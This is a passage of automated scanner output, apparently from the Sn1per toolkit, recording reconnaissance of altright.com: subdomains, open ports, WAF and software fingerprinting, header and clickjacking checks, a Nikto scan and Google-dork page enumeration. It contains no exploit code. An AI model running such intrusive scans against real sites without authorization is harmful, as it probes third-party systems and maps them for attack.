  690. ╚═╝╩╚═ ╩o╚═╝╩ ╩
  691. + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  692.  
  693. *.altright.com
  694. mail.altright.com
  695. nordic.altright.com
  696. www.altright.com
  697. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-altright.com-full.txt
  698.  
  699. + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  700. + -- ----------------------------=[Checking Email Security]=----------------- -- +
  701.  
  702. + -- ----------------------------=[Pinging host]=---------------------------- -- +
  703. PING altright.com(2400:cb00:2048:1::681b:b35b (2400:cb00:2048:1::681b:b35b)) 56 data bytes
  704. 64 bytes from 2400:cb00:2048:1::681b:b35b (2400:cb00:2048:1::681b:b35b): icmp_seq=1 ttl=60 time=29.1 ms
  705.  
  706. --- altright.com ping statistics ---
  707. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  708. rtt min/avg/max/mdev = 29.177/29.177/29.177/0.000 ms
  709.  
  710. + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  711.  
  712. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-28 04:53 EDT
  713. Nmap scan report for altright.com (104.27.179.91)
  714. Host is up (0.12s latency).
  715. Other addresses for altright.com (not scanned): 2400:cb00:2048:1::681b:b25b 2400:cb00:2048:1::681b:b35b 104.27.178.91
  716. Not shown: 468 filtered ports
  717. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  718. PORT STATE SERVICE
  719. 80/tcp open http
  720. 443/tcp open https
  721. 8080/tcp open http-proxy
  722. 8443/tcp open https-alt
  723. 8880/tcp open cddbp-alt
  724.  
  725. Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds
  726.  
  727. + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  728. + -- --=[Port 21 closed... skipping.
  729. + -- --=[Port 22 closed... skipping.
  730. + -- --=[Port 23 closed... skipping.
  731. + -- --=[Port 25 closed... skipping.
  732. + -- --=[Port 53 closed... skipping.
  733. + -- --=[Port 79 closed... skipping.
  734. + -- --=[Port 80 opened... running tests...
  735. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  736.  
  737. ^ ^
  738. _ __ _ ____ _ __ _ _ ____
  739. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  740. | V V // o // _/ | V V // 0 // 0 // _/
  741. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  742. <
  743. ...'
  744.  
  745. WAFW00F - Web Application Firewall Detection Tool
  746.  
  747. By Sandro Gauci && Wendel G. Henrique
  748.  
  749. Checking http://altright.com
  750. The site http://altright.com is behind a CloudFlare
  751. Number of requests: 1
  752.  
  753. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  754. http://altright.com [301 Moved Permanently] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.27.179.91], RedirectLocation[https://altright.com/], UncommonHeaders[cf-ray]
  755. https://altright.com/ [200 OK] CloudFlare, Cookies[__cfduid,wfvt_2729720346], Country[UNITED STATES][US], Google-Analytics[Universal][UA-90381947-1], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid,wfvt_2729720346], IP[104.27.179.91], MetaGenerator[WordPress 4.8.2], Open-Graph-Protocol[website], PHP[5.6.31], Script[application/javascript,text/javascript], Title[AltRight.com], UncommonHeaders[link,cf-ray], WordPress[4.8.2], X-Powered-By[PHP/5.6.31]
  756.  
  757. __ ______ _____
  758. \ \/ / ___|_ _|
  759. \ /\___ \ | |
  760. / \ ___) || |
  761. /_/\_|____/ |_|
  762.  
  763. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  764. + -- --=[Target: altright.com:80
  765. + -- --=[Site not vulnerable to Cross-Site Tracing!
  766. + -- --=[Site not vulnerable to Host Header Injection!
  767. + -- --=[Site vulnerable to Cross-Frame Scripting!
  768. + -- --=[Site vulnerable to Clickjacking!
  769.  
  770. HTTP/1.1 405 Not Allowed
  771. Date: Thu, 28 Sep 2017 08:53:30 GMT
  772. Content-Type: text/html
  773. Content-Length: 177
  774. Connection: close
  775. Server: -nginx
  776. CF-RAY: -
  777.  
  778. <html>
  779. <head><title>405 Not Allowed</title></head>
  780. <body bgcolor="white">
  781. <center><h1>405 Not Allowed</h1></center>
  782. <hr><center>cloudflare-nginx</center>
  783. </body>
  784. </html>
  785.  
  786. HTTP/1.1 301 Moved Permanently
  787. Date: Thu, 28 Sep 2017 08:53:31 GMT
  788. Transfer-Encoding: chunked
  789. Connection: keep-alive
  790. Cache-Control: max-age=3600
  791. Expires: Thu, 28 Sep 2017 09:53:31 GMT
  792. Location: https://altright.com/
  793. Server: cloudflare-nginx
  794. CF-RAY: 3a557906f3266908-CDG
  795.  
  796. 0
  797.  
  798.  
  799.  
  800.  
  801.  
  802. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  803. + -- --=[Checking if X-Content options are enabled on altright.com...
  804.  
  805. + -- --=[Checking if X-Frame options are enabled on altright.com...
  806.  
  807. + -- --=[Checking if X-XSS-Protection header is enabled on altright.com...
  808.  
  809. + -- --=[Checking HTTP methods on altright.com...
  810.  
  811. + -- --=[Checking if TRACE method is enabled on altright.com...
  812.  
  813. + -- --=[Checking for META tags on altright.com...
  814.  
  815. + -- --=[Checking for open proxy on altright.com...
  816. </div><!-- /#cf-wrapper -->
  817.  
  818. <script type="text/javascript">
  819. window._cf_translation = {};
  820.  
  821.  
  822. </script>
  823.  
  824. </body>
  825. </html>
  826.  
  827. + -- --=[Enumerating software on altright.com...
  828. Server: cloudflare-nginx
  829.  
  830. + -- --=[Checking if Strict-Transport-Security is enabled on altright.com...
  831.  
  832. + -- --=[Checking for Flash cross-domain policy on altright.com...
  833.  
  834. + -- --=[Checking for Silverlight cross-domain policy on altright.com...
  835.  
  836. + -- --=[Checking for HTML5 cross-origin resource sharing on altright.com...
  837.  
  838. + -- --=[Retrieving robots.txt on altright.com...
  839.  
  840. + -- --=[Retrieving sitemap.xml on altright.com...
  841.  
  842. + -- --=[Checking cookie attributes on altright.com...
  843.  
  844. + -- --=[Checking for ASP.NET Detailed Errors on altright.com...
  845. .kid-author-box .author-info .kid-author-page-contact a:hover, .error-number h1, #kid-404-wrap .kid-error-title,
  846. <body class="error404">
  847. <img src="https://altright.com/wp-content/themes/sterling-child/img/altright-logo.svg" alt="AltRight.com" width="430" height="45" alt="AltRight.com" onerror="this.removeAttribute('onerror'); this.src='https://altright.com/wp-content/themes/sterling-child/img/altright-logo.png'" />
  848. <div class="error-number">
  849. <h4 class="kid-error-title">Page not found</h4>
  850.  
  851.  
  852. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  853. - Nikto v2.1.6
  854. ---------------------------------------------------------------------------
  855. + Target IP: 104.27.178.91
  856. + Target Hostname: altright.com
  857. + Target Port: 80
  858. + Start Time: 2017-09-28 04:53:34 (GMT-4)
  859. ---------------------------------------------------------------------------
  860. + Server: cloudflare-nginx
  861. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  862. + Uncommon header 'cf-ray' found, with contents: 3a55791de5806944-CDG
  863. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  864. + All CGI directories 'found', use '-C none' to test none
  865. + Server banner has changed from 'cloudflare-nginx' to '-nginx' which may suggest a WAF, load balancer or proxy is in place
  866. + 26097 requests: 0 error(s) and 3 item(s) reported on remote host
  867. + End Time: 2017-09-28 07:57:34 (GMT-4) (11040 seconds)
  868. ---------------------------------------------------------------------------
  869. + 1 host(s) tested
  870. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  871. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/altright.com-port80.jpg
  872. + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  873. + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  874.  
  875. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  876. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
  877. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
  878. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
  879. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
  880. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
  881. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  882.  
  883. __[ ! ] Neither war between hackers, nor peace for the system.
  884. __[ ! ] http://blog.inurl.com.br
  885. __[ ! ] http://fb.com/InurlBrasil
  886. __[ ! ] http://twitter.com/@googleinurl
  887. __[ ! ] http://github.com/googleinurl
  888. __[ ! ] Current PHP version::[ 7.0.22-3 ]
  889. __[ ! ] Current script owner::[ root ]
  890. __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
  891. __[ ! ] Current pwd::[ /usr/share/sniper ]
  892. __[ ! ] Help: php inurlbr.php --help
  893. ------------------------------------------------------------------------------------------------------------------------
  894.  
  895. [ ! ] Starting SCANNER INURLBR 2.1 at [28-09-2017 07:58:20]
  896. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  897. It is the end user's responsibility to obey all applicable local, state and federal laws.
  898. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  899.  
  900. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-altright.com.txt ]
  901. [ INFO ][ DORK ]::[ site:altright.com ]
  902. [ INFO ][ SEARCHING ]:: {
  903. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.im ]
  904.  
  905. [ INFO ][ SEARCHING ]::
  906. -[:::]
  907. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  908.  
  909. [ INFO ][ SEARCHING ]::
  910. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  911. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.nr ID: 007843865286850066037:b0heuatvay8 ]
  912.  
  913. [ INFO ][ SEARCHING ]::
  914. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  915.  
  916. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  917.  
  918.  
  919. _[ - ]::--------------------------------------------------------------------------------------------------------------
  920. |_[ + ] [ 0 / 100 ]-[07:58:32] [ - ]
  921. |_[ + ] Target:: [ https://altright.com/ ]
  922. |_[ + ] Exploit::
  923. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  924. |_[ + ] More details::
  925. |_[ + ] Found:: UNIDENTIFIED
  926.  
  927. _[ - ]::--------------------------------------------------------------------------------------------------------------
  928. |_[ + ] [ 1 / 100 ]-[07:58:33] [ - ]
  929. |_[ + ] Target:: [ https://altright.com/donate/ ]
  930. |_[ + ] Exploit::
  931. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  932. |_[ + ] More details::
  933. |_[ + ] Found:: UNIDENTIFIED
  934.  
  935. _[ - ]::--------------------------------------------------------------------------------------------------------------
  936. |_[ + ] [ 2 / 100 ]-[07:58:34] [ - ]
  937. |_[ + ] Target:: [ https://altright.com/submissions/ ]
  938. |_[ + ] Exploit::
  939. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  940. |_[ + ] More details::
  941. |_[ + ] Found:: UNIDENTIFIED
  942.  
  943. _[ - ]::--------------------------------------------------------------------------------------------------------------
  944. |_[ + ] [ 3 / 100 ]-[07:58:35] [ - ]
  945. |_[ + ] Target:: [ https://altright.com/account/ ]
  946. |_[ + ] Exploit::
  947. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  948. |_[ + ] More details::
  949. |_[ + ] Found:: UNIDENTIFIED
  950.  
  951. _[ - ]::--------------------------------------------------------------------------------------------------------------
  952. |_[ + ] [ 4 / 100 ]-[07:58:36] [ - ]
  953. |_[ + ] Target:: [ https://nordic.altright.com/ ]
  954. |_[ + ] Exploit::
  955. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  956. |_[ + ] More details::
  957. |_[ + ] Found:: UNIDENTIFIED
  958.  
  959. _[ - ]::--------------------------------------------------------------------------------------------------------------
  960. |_[ + ] [ 5 / 100 ]-[07:58:38] [ - ]
  961. |_[ + ] Target:: [ https://altright.com/chat/ ]
  962. |_[ + ] Exploit::
  963. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  964. |_[ + ] More details::
  965. |_[ + ] Found:: UNIDENTIFIED
  966.  
  967. _[ - ]::--------------------------------------------------------------------------------------------------------------
  968. |_[ + ] [ 6 / 100 ]-[07:58:39] [ - ]
  969. |_[ + ] Target:: [ https://altright.com/contact/ ]
  970. |_[ + ] Exploit::
  971. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  972. |_[ + ] More details::
  973. |_[ + ] Found:: UNIDENTIFIED
  974.  
  975. _[ - ]::--------------------------------------------------------------------------------------------------------------
  976. |_[ + ] [ 7 / 100 ]-[07:58:40] [ - ]
  977. |_[ + ] Target:: [ https://nordic.altright.com/author/kristofferhugin/ ]
  978. |_[ + ] Exploit::
  979. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  980. |_[ + ] More details::
  981. |_[ + ] Found:: UNIDENTIFIED
  982.  
  983. _[ - ]::--------------------------------------------------------------------------------------------------------------
  984. |_[ + ] [ 8 / 100 ]-[07:58:42] [ - ]
  985. |_[ + ] Target:: [ https://nordic.altright.com/2017/06/ ]
  986. |_[ + ] Exploit::
  987. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  988. |_[ + ] More details::
  989. |_[ + ] Found:: UNIDENTIFIED
  990.  
  991. _[ - ]::--------------------------------------------------------------------------------------------------------------
  992. |_[ + ] [ 9 / 100 ]-[07:58:44] [ - ]
  993. |_[ + ] Target:: [ https://nordic.altright.com/2017/05/ ]
  994. |_[ + ] Exploit::
  995. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  996. |_[ + ] More details::
  997. |_[ + ] Found:: UNIDENTIFIED
  998.  
  999. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1000. |_[ + ] [ 10 / 100 ]-[07:58:45] [ - ]
  1001. |_[ + ] Target:: [ https://nordic.altright.com/om-oss/ ]
  1002. |_[ + ] Exploit::
  1003. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1004. |_[ + ] More details::
  1005. |_[ + ] Found:: UNIDENTIFIED
  1006.  
  1007. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1008. |_[ + ] [ 11 / 100 ]-[07:58:46] [ - ]
  1009. |_[ + ] Target:: [ https://nordic.altright.com/author/robertr/ ]
  1010. |_[ + ] Exploit::
  1011. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1012. |_[ + ] More details::
  1013. |_[ + ] Found:: UNIDENTIFIED
  1014.  
  1015. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1016. |_[ + ] [ 12 / 100 ]-[07:58:47] [ - ]
  1017. |_[ + ] Target:: [ https://nordic.altright.com/category/kultur/ ]
  1018. |_[ + ] Exploit::
  1019. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1020. |_[ + ] More details::
  1021. |_[ + ] Found:: UNIDENTIFIED
  1022.  
  1023. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1024. |_[ + ] [ 13 / 100 ]-[07:58:48] [ - ]
  1025. |_[ + ] Target:: [ https://nordic.altright.com/2017/08/ ]
  1026. |_[ + ] Exploit::
  1027. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1028. |_[ + ] More details::
  1029. |_[ + ] Found:: UNIDENTIFIED
  1030.  
  1031. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1032. |_[ + ] [ 14 / 100 ]-[07:58:49] [ - ]
  1033. |_[ + ] Target:: [ https://nordic.altright.com/metapolitisk-ordlista/ ]
  1034. |_[ + ] Exploit::
  1035. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1036. |_[ + ] More details::
  1037. |_[ + ] Found:: UNIDENTIFIED
  1038.  
  1039. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1040. |_[ + ] [ 15 / 100 ]-[07:58:51] [ - ]
  1041. |_[ + ] Target:: [ https://nordic.altright.com/category/vetenskap/ ]
  1042. |_[ + ] Exploit::
  1043. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1044. |_[ + ] More details::
  1045. |_[ + ] Found:: UNIDENTIFIED
  1046.  
  1047. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1048. |_[ + ] [ 16 / 100 ]-[07:58:52] [ - ]
  1049. |_[ + ] Target:: [ https://nordic.altright.com/category/perspektiv/ ]
  1050. |_[ + ] Exploit::
  1051. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1052. |_[ + ] More details::
  1053. |_[ + ] Found:: UNIDENTIFIED
  1054.  
  1055. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1056. |_[ + ] [ 17 / 100 ]-[07:58:54] [ - ]
  1057. |_[ + ] Target:: [ https://nordic.altright.com/2017/09/ ]
  1058. |_[ + ] Exploit::
  1059. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1060. |_[ + ] More details::
  1061. |_[ + ] Found:: UNIDENTIFIED
  1062.  
  1063. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1064. |_[ + ] [ 18 / 100 ]-[07:58:55] [ - ]
  1065. |_[ + ] Target:: [ https://nordic.altright.com/2017/07/ ]
  1066. |_[ + ] Exploit::
  1067. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1068. |_[ + ] More details::
  1069. |_[ + ] Found:: UNIDENTIFIED
  1070.  
  1071. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1072. |_[ + ] [ 19 / 100 ]-[07:58:56] [ - ]
  1073. |_[ + ] Target:: [ https://nordic.altright.com/tag/althogern/ ]
  1074. |_[ + ] Exploit::
  1075. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1076. |_[ + ] More details::
  1077. |_[ + ] Found:: UNIDENTIFIED
  1078.  
  1079. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1080. |_[ + ] [ 20 / 100 ]-[07:58:57] [ - ]
  1081. |_[ + ] Target:: [ https://nordic.altright.com/category/media/ ]
  1082. |_[ + ] Exploit::
  1083. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1084. |_[ + ] More details::
  1085. |_[ + ] Found:: UNIDENTIFIED
  1086.  
  1087. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1088. |_[ + ] [ 21 / 100 ]-[07:58:58] [ - ]
  1089. |_[ + ] Target:: [ https://nordic.altright.com/tag/ras/ ]
  1090. |_[ + ] Exploit::
  1091. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1092. |_[ + ] More details::
  1093. |_[ + ] Found:: UNIDENTIFIED
  1094.  
  1095. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1096. |_[ + ] [ 22 / 100 ]-[07:59:00] [ - ]
  1097. |_[ + ] Target:: [ https://nordic.altright.com/author/jonasnilsson/ ]
  1098. |_[ + ] Exploit::
  1099. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1100. |_[ + ] More details::
  1101. |_[ + ] Found:: UNIDENTIFIED
  1102.  
  1103. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1104. |_[ + ] [ 23 / 100 ]-[07:59:01] [ - ]
  1105. |_[ + ] Target:: [ https://nordic.altright.com/author/magnussoderman/ ]
  1106. |_[ + ] Exploit::
  1107. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1108. |_[ + ] More details::
  1109. |_[ + ] Found:: UNIDENTIFIED
  1110.  
  1111. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1112. |_[ + ] [ 24 / 100 ]-[07:59:02] [ - ]
  1113. |_[ + ] Target:: [ https://nordic.altright.com/tag/nationalism/ ]
  1114. |_[ + ] Exploit::
  1115. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1116. |_[ + ] More details::
  1117. |_[ + ] Found:: UNIDENTIFIED
  1118.  
  1119. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1120. |_[ + ] [ 25 / 100 ]-[07:59:03] [ - ]
  1121. |_[ + ] Target:: [ https://nordic.altright.com/author/mannenm/ ]
  1122. |_[ + ] Exploit::
  1123. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1124. |_[ + ] More details::
  1125. |_[ + ] Found:: UNIDENTIFIED
  1126.  
  1127. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1128. |_[ + ] [ 26 / 100 ]-[07:59:05] [ - ]
  1129. |_[ + ] Target:: [ https://nordic.altright.com/tag/terrorism/ ]
  1130. |_[ + ] Exploit::
  1131. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1132. |_[ + ] More details::
  1133. |_[ + ] Found:: UNIDENTIFIED
  1134.  
  1135. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1136. |_[ + ] [ 27 / 100 ]-[07:59:06] [ - ]
  1137. |_[ + ] Target:: [ https://nordic.altright.com/tag/djurratt/ ]
  1138. |_[ + ] Exploit::
  1139. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1140. |_[ + ] More details::
  1141. |_[ + ] Found:: UNIDENTIFIED
  1142.  
  1143. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1144. |_[ + ] [ 28 / 100 ]-[07:59:07] [ - ]
  1145. |_[ + ] Target:: [ https://nordic.altright.com/tag/expo/ ]
  1146. |_[ + ] Exploit::
  1147. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1148. |_[ + ] More details::
  1149. |_[ + ] Found:: UNIDENTIFIED
  1150.  
  1151. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1152. |_[ + ] [ 29 / 100 ]-[07:59:08] [ - ]
  1153. |_[ + ] Target:: [ https://nordic.altright.com/author/antons/ ]
  1154. |_[ + ] Exploit::
  1155. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1156. |_[ + ] More details::
  1157. |_[ + ] Found:: UNIDENTIFIED
  1158.  
  1159. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1160. |_[ + ] [ 30 / 100 ]-[07:59:09] [ - ]
  1161. |_[ + ] Target:: [ https://nordic.altright.com/tag/kulturelit/ ]
  1162. |_[ + ] Exploit::
  1163. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1164. |_[ + ] More details::
  1165. |_[ + ] Found:: UNIDENTIFIED
  1166.  
  1167. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1168. |_[ + ] [ 31 / 100 ]-[07:59:10] [ - ]
  1169. |_[ + ] Target:: [ https://nordic.altright.com/tag/kulturhuset/ ]
  1170. |_[ + ] Exploit::
  1171. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1172. |_[ + ] More details::
  1173. |_[ + ] Found:: UNIDENTIFIED
  1174.  
  1175. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1176. |_[ + ] [ 32 / 100 ]-[07:59:12] [ - ]
  1177. |_[ + ] Target:: [ https://nordic.altright.com/tag/charlottesville/ ]
  1178. |_[ + ] Exploit::
  1179. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1180. |_[ + ] More details::
  1181. |_[ + ] Found:: UNIDENTIFIED
  1182.  
  1183. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1184. |_[ + ] [ 33 / 100 ]-[07:59:13] [ - ]
  1185. |_[ + ] Target:: [ https://nordic.altright.com/tag/ensamkommande/ ]
  1186. |_[ + ] Exploit::
  1187. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1188. |_[ + ] More details::
  1189. |_[ + ] Found:: UNIDENTIFIED
  1190.  
  1191. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1192. |_[ + ] [ 34 / 100 ]-[07:59:14] [ - ]
  1193. |_[ + ] Target:: [ https://nordic.altright.com/author/yugobay/ ]
  1194. |_[ + ] Exploit::
  1195. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1196. |_[ + ] More details::
  1197. |_[ + ] Found:: UNIDENTIFIED
  1198.  
  1199. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1200. |_[ + ] [ 35 / 100 ]-[07:59:14] [ - ]
  1201. |_[ + ] Target:: [ https://nordic.altright.com/tag/jagarhar/ ]
  1202. |_[ + ] Exploit::
  1203. |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, Server: cloudflare-nginx , IP:2400:cb00:2048:1::681b:b35b:443
  1204. |_[ + ] More details::
  1205. |_[ + ] Found:: UNIDENTIFIED
  1206.  
  1207. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1208. |_[ + ] [ 36 / 100 ]-[07:59:16] [ - ]
  1209. |_[ + ] Target:: [ https://nordic.altright.com/tag/altruism/ ]
  1210. |_[ + ] Exploit::
  1211. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1212. |_[ + ] More details::
  1213. |_[ + ] Found:: UNIDENTIFIED
  1214.  
  1215. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1216. |_[ + ] [ 37 / 100 ]-[07:59:17] [ - ]
  1217. |_[ + ] Target:: [ https://nordic.altright.com/author/simonjester/ ]
  1218. |_[ + ] Exploit::
  1219. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx X-Powered-By: PHP/5.6.31, IP:2400:cb00:2048:1::681b:b35b:443
  1220. |_[ + ] More details::
  1221. |_[ + ] Found:: UNIDENTIFIED
  1222.  
  1223. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1224. |_[ + ] [ 38 / 100 ]-[07:59:18] [ - ]
  1225. |_[ + ] Target:: [ https://nordic.altright.com/tag/batikhaxor/ ]
  1226. |_[ + ] Exploit::
